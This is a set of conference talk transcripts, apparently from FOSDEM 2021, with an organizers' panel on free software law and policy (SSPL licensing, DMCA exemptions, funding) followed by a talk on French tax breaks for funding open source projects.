why open source free software is so important and why, especially if it comes to sharing across borders and across languages, it's so important that we have this tracing app in Spain, in Germany, and I don't know in Austria in a different language, but they are able to talk to each other. And this is only possible because it is free software. And we had a huge debate here in Europe around these tracing apps and especially around that it is free software. And so this might help at the end and also in the health panel, we've seen that there had been loads of hackathons, for example, that the results have been published as free software because it is a good idea to do so. And I think this panel was also very interesting in this regard. If you speak about health apps and the corona tracing apps, it's still quite interesting that the platform for all of this, while we have two gatekeepers here with Google and Apple, and it took the free software community quite a few of months to make this possible, like to have these exposure notifications API all implemented with free software. And so people can just install it from, for instance, after for Android phones. So we're again in the situation where the software itself is free, but the platform is not. It's quite interesting also for publicly funded software to see basically can I really use it with as much software freedom as possible? And it turns out it's still quite interesting a long way to go. Yeah, certainly when you compare it to the United States, all the new stories were about Google and Apple, we're going to solve the contact tracing problem and all of the apps that are proprietary that people are using here, so I'm so glad to hear that in Europe. As we heard about in the, when I was listening to the, the DMA talk, I mean, the DMA talk was sort of saying, well, we need to make this law so much better in Europe. And I was looking at his slides of stuff that's already in your laws in Europe. And I'm like, I wish we had that much like what you already have in Europe, I wish we had here in the US because there are no laws that are very friendly to interoperability and free software the way that you already have in Europe. So, so kudos to you all who've done policy work in Europe to make that happen over the last 20 years because we, we, we unfortunately do not have a system where it's easy for us to get that stuff into our legislation here in the United States. Yep, and a shout out to Deb and Hong Fook's talk for, for, for bringing the conversation global. We are a global community as free software contributors. And it's, it's important to, to learn from all of the, the work being done in different places, especially where it's successful. And I, I agree it's the US is not, is not a great example of that, which maybe is a good transition to talk about something that has happened in the last year that we didn't cover in the Dev Room Bradley. I don't know if it's makes sense to talk about just to fill people in on the DMCA stuff when we talk about how bad things are in the, in the United States or Richard, I don't know if you have any. I mean, the start of the fountain I talked about this a lot. I mean, the startup culture in the US has had some influence on FOS and not usually particularly good. I mean, do you want to, do you want to talk a little bit about what's happened in the last year with, with, with some of the startups have done with regard to licensing that's been really much in the news the last, the last year? Yeah. So I remember we, we actually talked about this in our organizers panel last year. I think it was last year and not, not the year before. And it was a major topic then. So we were seeing this trend of, you know, I want to say startups, but it's not, you know, I'm not sure it's, it's limited to what I would call startups, but smaller tech companies that have grown up around a sort of vendor controlled free software slash open source project. You know, typically using a certain type of governance model that emphasizes, you know, using a kind of asymmetrical contributor agreement, a CLA or whatever. And not really having a very, you know, a significant contributor community in part because these, these companies tend to be hostile to, to outside contributors for various reasons. And then these companies sort of a few years ago started experimenting with licensing models that resembled, you know, sort of free and open source software licenses in some respects, but deviated from them in significant ways. And you know, MongoDB and the server side public license was the first notable example of this and at least in the modern era. And that was about three or four years ago now. But we saw a number of other companies moving in this direction. And we talked about that a little bit last year. So very recently, the latest company to do something like this was Elastic. Earlier this month announced that it was going to use the server side public license. So the license that MongoDB had introduced for, for some of its projects. And so, so, you know, this, this is, you know, from my perspective, at least a pretty disturbing development. These companies have, you know, in part been sort of blurring the meaning of, you know, it's really open source, not free software. So they've been, they've been blurring the meaning of open source and sort of trying to, to push on the boundaries of the open source definition. And, you know, this, the, the, the main feature of these various licenses is sort of, you know, I would say sort of use restrictions. So kind of prohibitions on, on use cases by competitors. Essentially, you know, to a large extent, these companies are concerned about competition from, you know, cloud providers. And that's, that's kind of motivated some of these, these license changes. But you know, kind of more, more broadly, I think this just sort of is part of a longer theme of, of, you know, tension that's existed, you know, between sort of like free software or open source as a means of kind of building a basis for business success versus the kind of ethical goals that, that lie behind, you know, free software and, and I would say open source as well. And, and we know year after year, we continue to see interesting examples of this. And this is sort of the, the latest, I guess. And interestingly, we had a talk in our, in our Dev Room this year, you know, about this kind of proprietary licensing business model. I think when we were doing the acceptance for the talk, for the talks, I was sort of most skeptical about that because I didn't want to provide a mouthpiece to the proprietary relicensing regime that MongoDB and Elastic and other such companies are putting forward. The really nice thing, I kept an open mind about it. And I actually think it ended up, I would give that talk the best talk of the year award on our track because I think it really laid out in a very clear way how the, the, the Q, QT situation impacted the KDE project and how the KDE project by being a strong existing free software project probably, and still to this day, I think probably the largest user of QT, of anybody in, in any software space at all was able to leverage their, their community power to assure that QT remained free software and to bind the company and its successors to continue to improve the free software. It's quite a magic trick from my point of view that they were able for so long across so many owners of QT to assure that, that, that the public version of free software version of QT did not become a, you know, just a, you know, unmaintained kind of afterthought release. And that's something that I think was unique to KDE. I disagree a little bit with Cornelius's conclusion that we could do this for any of these projects because I think it was almost a artifact of its time that, that open source was not something that someone wanted to market around. I don't think any QT could go to other customers in the late 1990s and convince them to buy, to, to, you know, to buy based on it being open source, whereas MongoDB and Elastic are seeing that. The other thing that's really disturbing about the Elastic move different than the MongoDB move is they moved from a free software license to this SS public license, which is, is not a FOSS license. And it's played into this view of copy left versus anti copy left because MongoDB tried so hard to convince people the SS public license was the future of copy left as they, they put it when they began marketing it. And here we have Elastic switching from the non copy left Apache license to a, to SS public license. And so I found it very difficult as an activist and a policy person to explain the nuance of well actually the SS public license isn't a copy left license. And if it were, if there were a copy left license they switched to, it might have helped them fight Amazon in the way that they wanted to. But what they did instead is they switched to this non free license to fight Amazon. So, so I, and I have, I'm curious how that's playing out in, for my European colleagues in Europe and if folks are, folks are able to see that nuance in a way they haven't been able to here in the U S. I'm not so sure whether there's a big difference between the European view and the US review. Definitely troubles also us as well at the FSA fee that this happens. Definitely. So I think the difference here between the, the KDQ model that Cornelius presented and Elastic is well, cute and, and KD they wanted to cooperate. And they were mature enough in the sense of like, let's cooperate with each other. So they had this agreement and it has been fulfilled also by the successors basically. So we see here a successful fruitful cooperation while as Richard already said, a CLA is this as a asymmetric way of contribution. And so, well, this has been basically laid out that this could happen. And I think, I think a big topic will be how to, how like the free software contributors want to interact with companies or with organizations that might take their contributions away and make them basically proprietary. So this is a discussion to lead and I think it's not bound to the US or to Europe in specific. But yeah, I found this maturity discussion quite interesting, a shared theme among like Cornelius talk, but also in the compliance panel that you moderated Bradley, which I found definitely interesting. And also I would quote David from Huawei when he says that, well, you can really see whether a company is mature enough if their false compliance is actually a mature process and a good process that they have. And I quite like this that, yeah, companies think from the beginning on in free software terms and this as a thoughtless after product basically. And to be honest, I missed a little bit the mention of reuse here because I think this is a perfect example how communities and projects can fix, clarify their licensing and their copyright from the start on. And this is the thing that can be created or worked with by organizations and individual developers no matter which size they have or no matter the project size. And I would love to see this more that people care from the very start on like the Yorkter project that they are actually with every release, combined with the software, but also that they have properly declared the licensing and copyright of their project because I think we still waste too much energy into fixing problems after they have been created with tools like Phosology which are great and which we need, but we should put more effort into fixing those issues before they have been created. Yeah, and I guess we could tell our audience that there was an excellent talk submitted on reuse and our FSTEP Europe colleagues were surprised to learn that we had a, we had long ago created this rule that unless it's a substitution talk because of somebody not showing up, we've always made it that anybody, any organization that's kind of represented on the organizers panel can only have one talk from the organization in any given year at Fostem. So we did have to turn away some excellent talks from your colleagues at FSTEP Europe under that rule. So we're sorry that you were unpleasantly surprised by... No worries, I wasn't really surprised. That's fine for me and I love that my colleague also had his chance to speak in the strike and if people are interested, I gave a similar talk in the Open Chain Deaf Room, so just a pointer. So in the interest of the talk we weren't able to give Karen, so Conservancy had some work this year that I guess we could cover here that we would have submitted a talk about if not for that rule regarding our DMCA work. Do you want to talk a little bit about that that happened this year here in the US? Sure, sure. I was looking to transition to it a little bit before when we were talking about how much worse the laws are in the United States compared to elsewhere in the world. So it seemed like a very easy time to transition to the Digital Millennium Copyright Act in the United States which provides prohibitions on circumventing technological protection measures in order to even do lawful uses of the technology. And so there's a process every three years where folks are invited to propose exemptions to that rule and Conservancy and others have been involved on behalf of free software. Throughout we, you know, many of the organizations protest the existence of the law to begin with and then engaging in the three-year cycle allows us to propose exemptions. And so Conservancy in the past applied for and won an exemption for smart TVs and I personally participated in one for medical devices. And this year Conservancy applied for a number of new exemptions. Ones to allow us to basically allow us to circumvent so that we can see what software is running in a device so we can know if there's a GPL violation. And so basically circumvention being used in order to hide copyright infringement. So it's sort of a novel argument for the Library of Congress in the United States and I'm looking forward to see how that plays out. We've also applied for one for routers which connects back to our router freedom talk that we had earlier in the Dev Room. And we had Bradley help me out. We are the only organization that was unwise enough to file three exemption requests. And we've filed one for a small expansion of the privacy restrictions that are in. There's a privacy allowance already in the law here in the US but one of our filings looks for a kind of a small expansion of that privacy exemption that already exists. Which is not granted it's not as big of a deal because the privacy exemption in the law is already pretty broad which is fortunate. But we're trying to move that edge a little bit forward in our exemption request. And with the highlighting that if we have control over our software we're going to use it to protect our privacy. And then I personally was also involved in an expansion of the medical devices one too. And so I'm excited about that process. It's granular but by moving the needle each time we start to see real freedom. And I think that because I think that what happens in the United States on these issues does have something of a reverberating effect globally. So it's good for people to stay up to date. Yeah and as part of that process this year I did some I spent two days kind of after we filed those I went digging trying to figure out why the DMCA is such a horrible law here in the US. And it's very it's very interesting history that it is worldwide affecting because it's because it's based on a WTO act the World Copyright Act I believe it's called WCT. It turns out the US kind of unsurprisingly implemented use the existence of this to bring in lots of things that media companies which of course many of which are based here in the US wanted as far as restrictions go. So our law here in the US goes much further than say the EUCD does in Europe but it's really a worldwide problem. And the amazing thing is that this this all started back in the early 90s. And so and then the DMCA is passed in the late 90s. So this is this is some 22 years of bad policy that we've had. And many people who are probably watching our deaf room like weren't even we're children when all of this policy went into place. And so we've looked at really trying to educate more about why these policies exist and how bad they are things like the MCA because most people have grown up with these as standards and the chilling effects that they create have become a regular part of life not just for free software but for all software. Yeah, in this regard, just a note, it was also quite interesting that the DMCA case about around YouTube DL had also an effect on European hostos, for instance. So we had a few cases here at least which I know personally in Germany where their mirrors of the software also had to be taken down and this is quite interesting that you might have bad regulation in the US but it has definitely an effect on on Europe as well as well as the other way around. Yeah, I just noticed that we had still one talk which we didn't speak about yet, which is the give open source a text break talk and perhaps Alex you want to talk about this a little bit. Since you you saw it as I know. Yes, yes, I attended this. It was also quite interesting. I mean, it's also a general question. How can we finance free software projects and it's not about a text break. Maybe it's a general and a fundamental question how we can get money into this. One solution can be due to these text things they have in France like you spend $10,000 and you get 66% I think it was like this back from the state if you if it's like for the for the whole community and stuff like this. So we have something similar in Germany. So I think it's a it's a general thing. So in Europe, for example, we have to you rise in 2020 a big research program. This has billions of dollars and I think a lot of more or more money could go into free software projects as well we have this open tech funds and stuff like this and discussions around funding in general. And this is something we should also think about and share some ideas and best practices now also think it's on the government side to fund free software projects. They use free software and they should also fund it and it's also good for our whole society and therefore there should be funds available in order to support these funds as we've seen now in the Corona crisis. It would be good to have some solutions in place before and yeah, so here, yeah, state money could could be a game changer in the future and we should make sure that there are funds available in order to make sure that there are good free software solutions in place for for other crisis and but also for the normal situation as well. Yeah they have been really interesting proposals in the United States over the years to provide tax breaks that would have real impact on the software freedom contributors in the United States things like things that proposals that were designed to to benefit artists that would provide benefit for free software developers. So in the United States if you make a donation of your code to a charity, you can deduct the cost only the cost. So if you're an artist, for example, you can deduct the cost of the painting like the canvas and the paints but you can't deduct your time and so even if you're a world famous painter and you could you know anyone else could sell your painting for millions of dollars, you can only take a tax deduction of your materials. And so there have been proposals in the United States that that have been to change that but none of those bills have passed. And so it's just interesting to to hear about, you know, possibilities elsewhere and to possibly revive some of those conversations in the United States too. So hopefully so this is obviously we said the pre-recorded part of our session given that we're at the end of the FOSM schedule by now probably all the online stuff should hopefully be working without any glitches. So we're going to hopefully join you all in the online chat after this and be able to to take questions from those of you that have watched our entire Dev Room here for the virtual legal and policy panel. And from my point of view, I'd be glad to be back in Brussels next year. So hopefully all the vaccines work and COVID coronavirus is the same as the flu by the time we spend time at FOSM and Moles around again, we can only hope. Yeah, I want to once again thank the FOSM organizers. It's so much work to put on a conference like this and they just did so much more work to make sure that nobody had to use proprietary software and that's so awesome. And I'm sorry we're not in person where we can't stand up and applaud them and also thank them in the hallway. And yeah, so, you know, I just wanted to mention that and then also we're also happy in the past we've had this time to hear about feedback from you all in terms of what you'd like to see in the future and play ways that we can improve the legal and policy Dev Room. And so we'd like to address questions first and then feedback. But if for some reason we don't have the live Q&A, feel free to contact us and give us that feedback. Bradley, do you want to tell them all what they should do in the room? I, we don't know all the details at the time of recording, but there's probably stuff on the FOSM website and show you how to talk to us next as we wrap up here. So by the time they see this. I was joking. I was joking. I was the normally say clean the room. Oh, right. Yeah, yeah, that's true. People don't have to pick up there. If there's any trash you left behind, it's in your own house, your own home right now. So usually we have to clean up the venue. So clean up your house now. Yeah, like, yeah, okay. Everybody go clean your house and make sure that it's ready immediately. The next group when they come in on Monday. All right. Well, thanks everybody. Thanks for watching. Thanks to my co organizers for another FOSM. Thank you. Bye. We'll do Q&A now. I think you should get started. Wow. So we have made it to the end of FOSM 2021. This is the last session of our legal and policy dev room. I want to thank the audience for sticking with us and being here for this whole day. We've still got some time though. So we organizers are here to answer all the questions that you might have. And yeah, so I'm going to just start going through the questions in the channel. Again, by how they were upvoted. So we'll start with the first one, which is from Krishna, which is what did you miss most about the physical FOSM and what was the positive aspect of the online event for you personally? So I missed waffles and I made the waffle recipe as recommended. I was told by my co-panelists that I should not bring the batter out to show it on camera. I did not have time to make the waffle before, but as soon as this is over, I'm going to make the faster maffles, which they won't be as good. Yeah, I don't miss that my feet don't hurt. That's great. Awesome. I missed the hallway experience, definitely. So the chatter, but I have to say, I have to admit, I'm really impressed by how this has been pulled off by FOSM, how the experience came across the talks and the discussions afterwards. So really good work. Yeah. I think also all these social parts and the social events beside the FOSM itself, this is what I'm missing. I'm missing Brussels. Yeah, but Max just said, great. Thank you to the organizers of this virtual FOSM here. It went very, very well. It was quite a lot of fun. And yeah, thanks a lot. It made so much fun. And I want to put a really fine point on the fact that we were talking a lot in our pre-record about the questions of conferences requiring proprietary software like Zoom. This conference was done with 100% free software. I hope you all had a good experience, but from our point of view, it was completely seamless. I mean, it's not, of course, it's not as good as a live event. But this is the best online conference I've attended. And I think it's completely unreasonable for anybody to argue they have to use proprietary software to run online events now. There was one piece of proprietary software and all this one CAPTCHA that you had to get through to make the, if you made the account on chat.fosm.org. But for that little 100 lines of code to be the only proprietary software involved in all of this, please support FOSM. I helped them launch the T-shirt. And I was the first person to buy a sweatshirt because I happened to be on IRC at like two in the morning, Europe time when they launched it. So I bought a sweatshirt. I crashed the database, but I'm getting my sweatshirt anyway. But I encourage you all to go buy the T-shirts and sweatshirts and support FOSM. They're mostly volunteers doing this to make this happen. It's been amazing. I echo that. They did an incredible job. I miss seeing them all in person. I miss seeing all of you in person. It's not the same. Although I am surprised that it was so engaging and so all-consuming that it was just like a real FOSM where I didn't have a chance to eat or drink anything the whole time. And I also missed the chocolate in addition to missing all of you. So Richard, what about you? Oh, I mean, for me, Brussels is a totally magical place this time of year, despite the weather, which is slightly better typically than the weather I'm at now in the Northeast US. But it just has a special place in my heart. I've been going to FOSM for so many years now. But the online conference is really impressive, I have to say. I'm really happy to see how well that's worked out. So the next question that was upvoted is a follow-up to this one, I think, which is to panelists from the US, how does it feel that at the end of the sessions and follow-up discussions, you still have several hours before it is getting dark? The question is the other way around. I got up at 4.30 both days. The first day, none of my alarms worked and Karen had to call me. Second day, the alarms didn't work. I would say, yeah, it's really the waking up that's the issue, not the rest of the day. It doesn't help that much. It's very weird to have FOSM and then have a day with my family. That is super strange and really lovely. And also, again, makes me miss everybody more. But it's snowing here, so it's very, very brightly light outside. And it reminds me of the year where we had this massive snowstorm at FOSM. Richard, what about you? Oh, there's so much. I'm going to use this question. Yeah, so part of the experience is actually the jet lag. And I'm not experiencing any of that now. I got a full night's sleep. And that's just like, it's not quite the same thing, but I can remember what it was like and kind of sort of cherish that. If you move to the West Coast, I basically have the jet lag, right? Well, it was great that the FOSM organizers would allow us to do two afternoon sessions rather than a full day session. It really made it a lot more manageable for those of us in other time zones. I didn't want to get up at 1.30. All right, so what's going to be the next topic we're going to discuss next year? Let's start with the Europeans, since they didn't get a chance to answer the previous question. Well, that's hard. I mean, we kicked the session off with the European open source strategy by the European Commission. And as they just started this, I would love to follow up on this and to see what they've done in the then last year. But also we have seen on the DMA and the router freedom, and there are so many issues we are working on. And yeah, so it's hard to predict what's the most important one. There are so many, and we've seen a lot. And most of them will be there, I guess, also next year. Yeah, I think these are the policy topics on the legal side. Also really hard to predict. I guess we share the same issues there. Perhaps another uprise, another project that goes to SSPL. But perhaps also that developers think about CLA's, this asymmetric relationship with the companies that are going into. Perhaps we will see some discussion there, I hope so. But otherwise, yeah, I think in the chat it was mentioned, the Google versus Oracle. Could be a topic, maybe, depends on the outcome. Yeah, and on the general side, the learnings from the Corona crisis. And so we also discussed it here in the pre-recorded talk a bit. And I'm pretty sure that we'll keep us busy for this year as well. Bradley, do you want to add anything since I cut you up? Yeah, I think what decides our content is a lot of times what submissions we get from all of you. And we encourage people to submit talks when the CFP opens, watch the FOSDA mailing list, which is where it's posted first. We'll try to promote it as many places as we can. But we can only do as well as the talk submissions that we get. And we're committed to making this the place where you can give a talk about an advanced topic like you saw. I love that many of the speakers had to apologize when they did something basic, like during the AGPL talk. They had to say, we're going to explain it in a minified JavaScript as we know that's too basic, but we do want to make sure we cover it. And so we want to see more advanced talks to submit them. Yeah, and let us know if you have a suggestions for topics that should be covered, even if you don't want to do the presentation. Sometimes if we feel like there's a really important topic that's not being covered, we'll put together a panel to address it. So just let us give us feedback. It's very welcome. So to get to the next question, how to make companies stop using the term free software for non-free software programs? So as I just said, we tried to challenge this with blog posts and press releases and also collected in a wiki alternatives. And I think this is what we should also continue, like creating awareness, trying to prevent people buy or get these products and run into a vendor login and creating awareness on social networks, like commenting. If they treat about it, for example, then just post another tweet and say, this is not free software. And so prevent people from running into this vendor login and create awareness, I think. Yeah, I find that inundating people with questions is good. Like the constant, this isn't free software. Can sometimes wear depending on who the recipient is. It's always a good idea. But sometimes just saying, like asking about whether the software provides the freedoms that we expect free software to provide. Richard, go ahead. Yeah, I mean, I think in a way that the question is ambiguous because it could be referring like specifically to the phrase free software or kind of in a broader sense, the kind of free software in the sense of free software and open source, because some people, more people use the term open source in the world to mean approximately the same thing. And a lot of the abuse we see of that set of two terms occurs on the open source side because there's actually so, I think there's so little awareness of the free software terminology. And I think that the term free software in the English sense of gratis software is maybe not as common today. Maybe that's just my own work perception. But I think this is basically a linguistic problem. And the only way you're going to solve it is through kind of a concerted effort to make people aware of what software freedom applicants see as the meaning of free software. Yeah, I mean, the term software freedom was coined a long, long ago. I've been encouraging people to switch to it as the generic term for what we do since the early 2000s. Many others have done the same. I just say, you know, say software freedom. And the other phrase I've been using a lot lately is user rights, rights of the users. And if you focus on those phrases, I think the ambiguities of the linguistic problem melt away. So the next question from JWF is what role does individual consumer awareness about privacy and open source since the pandemic began? Is there opportunity and outreach and advocacy that could be better leveraged in light of the increasing dependence and reliance on digital solutions since COVID-19? It's a tough question. Yeah, I was going to say, like, I think that, you know, to some extent, there's been like where we've been on this path for for people to understand these issues more and more and more every year. Like, I've, you know, I remember five, 10 years ago at my family functions, they all thought that I was, you know, I saw their eyes glaze over whenever I talked about how vulnerable our technology was. And they were very nice to me because they're a really nice family. But they had no idea what I was talking about, whereas that's changed over the last five to 10 years, and people seem to really understand that we are vulnerable based on the technology that we choose. And it's small steps that we're getting there. And I think that the COVID crisis has cut both ways. Like I think on some ways, people are really open to new solutions. A lot of people, for example, were using Zoom who didn't use Zoom before. So it was like an introduction of proprietary software, unfortunately, to them. But if we, for the folks I got to first, who hadn't been using video chat, they did start using Jitsie or Big Blue Button more. And so there have been a lot of opportunities. It's, you know, it's hit or miss. We have to really stay focused on making it about the next pandemic or the next crisis rather than about now, because we have to acknowledge that people are doing the best they can and that everyone is like in a really stressful situation. Yeah, I also thought a little bit about it. I also see this split between groups of people, like some who are really aware of these issues and receptive and others are not. I'm not so sure. I saw a lot of discussions recently about those logos, like we, I think in Europe or only in Germany, I'm not sure, these blue angel logo, so where they mark sustainable products and a colleague of mine is working to get free software for sustainable software, basically, as a requirement. Not sure whether this helps, like these simple symbols, how people can see that something is good, even if they do not fully understand why it's good, they trust in the logo or in the picture, basically, and not sure whether that's a solution. Yeah, I think that one of the things that I recommend, so my spouse who didn't regularly use Zoom, of course, is using it every day now for her work for a small nonprofit, I really encourage people to go to their community organizations and volunteer to set them up with things like Big Blue Button and Jitsie and other technologies. This is a place where direct local volunteer work can actually help. You can't see them in person because it's socially distanced, but you can call them on the phone and talk to them about it and possibly help them get set up with alternative technologies to the proprietary ones they need during the pandemic. Okay, so the next question is, where is Copy Left Conf this year? Karen, should we pre-announce? I mean, I think we may as well. Okay, so one of the things we were waiting to see how FOSDM went, because if FOSDM can organize an online event like this, we figured we could probably draft off of their technology. We are going to focus on trying to do it not all at one time. I am not a big fan of asking people to get up at weird times to go to conferences. So we're going to try to do it as a seminar series on Copy Left over the later part of this year. So that's what Copy Left 2021 will be like. And we'll announce details on sfconservancy.org when we have them, which we do not right now. It's really fun to be there all day talking about issues that we care about, like Copy Left when we're in person, but virtual conferences are just exhausting. So we're going to probably, the sessions will probably be like an hour at a time over a few weeks. Now, a question that may take all the rest of our Q&A time, which is, how is the SSPL not Copy Left? Well, I mean, so the quote I've been using, it's a common quote in various places. I don't know who sourced it. But I keep saying every tool can be used as a weapon if you hold it wrong. And I think that whether or not the SS Public License is a Copy Left is sort of not that interesting of a point. Maybe it is, maybe it isn't. But even if it is, it's an abusive manipulation of what Copy Left was supposed to do. If you design a license that specifically makes it impossible to comply with the license because you have to, don't forget, SS Public License requires that every single piece of software involved in the stack on your computer, derivative work or not, has to be under the SS Public License. And no one can actually do that in the real world. I have yet to see someone who is licensing the SS Public License, licensing outbound on it who won't take it. As my colleague on the panel here, Richard Fontana, said years ago, inbound equals outbound is the right way to design contribution mechanisms. And that's not what the SS Public License is being used for. So I just think it's not even worth spending as much time as we've already spent on it. Yeah, I mean, it's in one sense, it's an interesting issue of language definition. But then once you decide where you stand on it, if a Copy Left license is defined as a free software license or whatever, a Libre license or open source license that has the features of Copy Left, then if you accept the view, which I think is the consensus view now that SSPL is not a free software and open source license, then that answers the question that it can't be a Copy Left license. But beyond that, I'm not sure it's really a very interesting question that it's really the policy issues about why the license isn't a free software license is the important question to think about. Okay, so we are now at the end of our Q&A session. We're going to go into the, what's the hallway track, but the live room where you can all join us and just see if you'd like or interact with us via text, the room link will be provided in the channel. But I want to take this opportunity to thank everybody and to say, clean your room. No, I mean, to say thank you for joining and also leave it to my panelists to say anything else they might want to say. Last words. Thank you. Thanks to the first time organizers. Thanks for attending. It was great and hope to see you next year in person. Max. I can only second Alex, that has been great. Thanks to my co-panelists here and to this co-organizers has been a really good experience. But yeah, we noticed time zones matter. I hope we can do this in Brussels live.
|
The organizers of the Legal and Policy DevRoom for FOSDEM 2022 discuss together the issues they've seen over the last year in FOSS, and consider what we can learn from the presentations on the track this year, and look forward together about the future of FOSS policy. The organizers of the Legal and Policy DevRoom for FOSDEM 2022 discuss together the issues they've seen over the last year in FOSS, and consider what we can learn from the presentations on the track this year, and look forward together about the future of FOSS policy.
|
10.5446/13927 (DOI)
|
Hello everyone, welcome to my presentation on giving open-source software a tax break. I think by now you should all be familiar with the format, so this is a prerecorded session and my digital version on the bottom left will guide you through the presentation while I'm available in the chat to answer any questions you might have. Before we start, I have two sentences to myself. My name is Sven Frank, I'm German, I work for NECCED, which is a free software publisher in the north of France, actually not so far from Brussels. I mostly work on administration and application for European and French R&D projects and I'm also the treasurer for the Fond des Duites-Une-du-Libre, which applied to hold this presentation today. It's an endowment fund, I will also use the abbreviation FDL now because my French pronunciation is still lacking, so every time I talk about FDL, it's the Fond des Duites-Une-du-Libre. For today's presentation, it took me about 20 minutes. I will first explain to you what is FDL, what is the French Endowment Fund. I will give you some examples how you can use tax breaks to find open-source software. Afterwards, I want to introduce a few examples of projects we either have completed or which we are currently working on and I'll close with some takeaways, which for me are the points which you should take away from this presentation. So let's start. FDL, like I said, it's an endowment fund created in 2018. I don't know about the specificities in other countries, but in France it's relatively easy to set up an endowment fund. You basically have to define the statues and submit them to the prefecture for validation and once it's validated that your endowment fund is in the way it's set up, is serving a general public interest, then you're more or less ready to go. For us, the idea to FDL was since at Next City, we do quite a lot of government-sponsored R&D projects, we wanted to replicate this procedure of applying for R&D budgets and projects within FDL. This means we require a dossier for every project which is to be undertaken and we have an expert committee currently with three panel members who evaluate proposals and who on the one hand have to assure that it's serving general public interest and on the other hand that it's a project they would recommend the FDL to finance. Once this is done, and it is financed, projects will, no, the other way. First I want to talk about the tax exemption. So the fondre d'assion or endowment funds in general, they finance themselves through donations. So in France, there's two levels of donations, one is 60% and one is 66%, one for corporations and one is for individuals. If I have some details on every slide, if you scroll down, we'll either provide links like in this case or some more explanations. Like I said, there's two versions or two different rates you can use for corporations that can reclaim up to 60% of donations, up to 2 million euros or it's capped at a half a percent of the annual turnover. So if you're a company and you're making one million of turnover, you have a cap of 5,000 euro, which means you can make a donation of 5,000 euro and can claim back 60% from taxes you will have to pay in the future. So that is 3,000 euro. For individuals, the percentage is 66% and the maximum is 20% of your taxable income. So also an example, if you have 40,000 euro taxable income, you can donate 8,000 euro per year and recover 66% of it from taxes you have to pay. So a donation of 2,000 euro would mean you could have a tax exemption of 1,320 euro. To give you two examples how this works, so imagine you have a company and you donate 10,000 euro to FDL, you can claim back 6,000 euros at the end of the year on the taxes you will have to pay. And FDL on the other side would receive project proposals to finance the development of certain open source software or similar proposals. Let's say it's a software project in this case and some features had to be developed. So we would run this project proposals by our committee who have to evaluate it. Like I said earlier, and if they agree and approve, then it's a project FDL will undertake. So eventually they will pay the developer 10,000 euro for adding this case feature 1,2,3 to the software. A variation to this is if you also utilize what is called in France, credit d'un pôle de recherche. So it's also a reimbursement on tax you have to pay for R&D activities, not for research activities, not development. So if I do the same example, a company would donate 7,000 euro to FDL, could claim back 4,200 euro at year's end. At the same time, a project proposal which now doesn't have development but research items, which is a research project more than a development project would also qualify for the credit d'un pôle de recherche, which means you could still finance a project worth 10,000 euro and in this case FDL would pay 7,000 euro to the developer and the developer could claim back 3,000 euro for his research activities from the taxes he will have to pay. So same result, you can finance projects of up to 10,000 euro doing it like this. My next one to talk about actual projects, where we applied both of the approaches. I will start with an easy one which is similar to the first example I showed, it's JXR, it's open source software. If you don't know, JXR is an online JavaScript spreadsheet editor, it's developed by a single developer in the UK called Moza Nova and FDL financed the development of a new release of his software, which was published in April of 2020 and for us it was actually the first project we undertook, a project where we also wanted to check whether the process we had set up was working as we intended it to do. So after we were approached regarding sponsoring the development of the specific feature set in JXR and after we went into contact with Moza Nova, we developed a dossier together and had it validated by our committee and then made a contract for the development of the features. And like I said, once it was published in April 2020, we paid, it was also 10,000 euro and the project was completed. If we look at the second project, which is currently ongoing, it's in the open hardware area, we call it currently open radio system. It's not software development, we are actually with FDL acquiring the technology of a remote radio hat. Our age, if you don't know what it is, of course it's the box in the picture. It's a device which you can use to extend the range of telecommunication networks. So imagine you want to have cell phone service in a subway tunnel. This is a box you would put there, which doesn't have a lot of range, but it can transmit a signal either 4G, LTE or 5G in the white corners of your network, which are hard to access. And the objective of acquiring the technology is to afterwards publish the PCB design files and bill of materials under an open source license. So some more info, the whole idea came about when we were approached last year by a small teleco provider who was closing down and to ask if we were interested in acquiring the technological assets, which included the remote radio hat. And since at NECCD we were involved in an R&D project four years ago, which topic was to create an open source telecommunications provider. So trying to research whether it was possible only with open source components to do everything you need to do to become a teleco provider. And that that project we already saw back then that the remote radio hat, that there not being an open source remote radio hat was a blocker. And we, yeah, back then we didn't have any solutions. So for us it was interesting once it was proposed to us to acquire the technological assets to say, we could do this and we could publish it. The PCB design and POM bill of materials under open source license. So everyone who is in the field of software defined radio signal processing, open source radio would have one missing component to building a complete solution. So long story short, we started to look for funding to do an acquisition and current status is that we finalized an acquisition contract and it has been signed and we're in the process of transferring the technological assets and trying to validate whether A, it's complete and B, whether it's, it is sufficient to reproduce the technology and to, for us and also in the next step for, for any third person who wants to use what we would publish once the project is over. So this project, a compliment to the open source and the open hardware projects I talked about just before. It's open service or the, what we call it currently the hyper open initiative. It's an initiative created by FDL and we already, so it's in the cloud area. We already have two cloud providers trying to implement the idea. The whole thing came about from where you all know currently interoperability in the cloud is, is a topic much discussed about with initiatives such as GaiaX and also reversibility is just as important and we thought that imagine you're using open software, you're using open hardware, but if a service is not open, you can never completely reproduce a cloud solution or a cloud service. So our idea was to create an initiative and to, to try and establish open service as an, as an equal part next to open source software and open hardware and to apply the four freedoms of free software to, to the service industry. So it means open service means that a service has to be usable. You have to be able to study how it's made. You have to be able to modify it and you have to be able to become your own provider of that service. So in the cloud for us, this means there must be transparency about what suppliers are using, what components, what procedures. And yes, basically to formalize this into something which cloud providers interested in could cooperate with us, we said, let's create an initiative, which we call the hyper open initiative and the current status. As I said earlier, we already have two cloud providers who are interested in implementing it and for us, this means there are two, two, two companies which with whom we are working together to, to, to look how this can actually be done, what needs to be documented to make a service reproducible. And yeah, we are working on documentation quite a lot and also in parallel, we are trying to create the underlying association and structure for, for this initiative. Next project, we're going into open data. It's also, it was the second project we were working on at FDL. It's called AFS.one, also in free software. It's a directory of European open source software publishers and with the selling proposal, it's the unique point that it's focusing on success cases for us. It's a question we often run into if we are in sales trying to sell free software. We suddenly get asked how many stars does the software have on GitHub, but we get asked, okay, which large industrial is using this? Can you show me an example? Or where is this used in a public administration where we can actually see what it's doing? So based on getting this question a lot of times, we thought, why don't we do like a yellow pages of European open source software publishers, but based, not based, but using, showing, showing the use cases and to make the whole thing in an open and contributable format. So the links are up there for everyone to check out if you're interested. So we have all the data in JSON format on a Git repository, you can contribute to it. And the idea is to have that data exportable and integratable in third party applications. Yes, just to be able to, if you have a catalog of famous proprietary software one and a catalog of famous proprietary software two, that you also have the possibility to create a catalog of free and open source software publishers and their solutions, including the success cases. And in the first step, or this was our first, so we used the first two nations we had in this project to, to create the first, the website, which at that time had about 150 publishers and their solutions and success cases. It's currently still at that level, since we didn't have the budget to continue all the time to continue working on it. It was in 2019 where we also 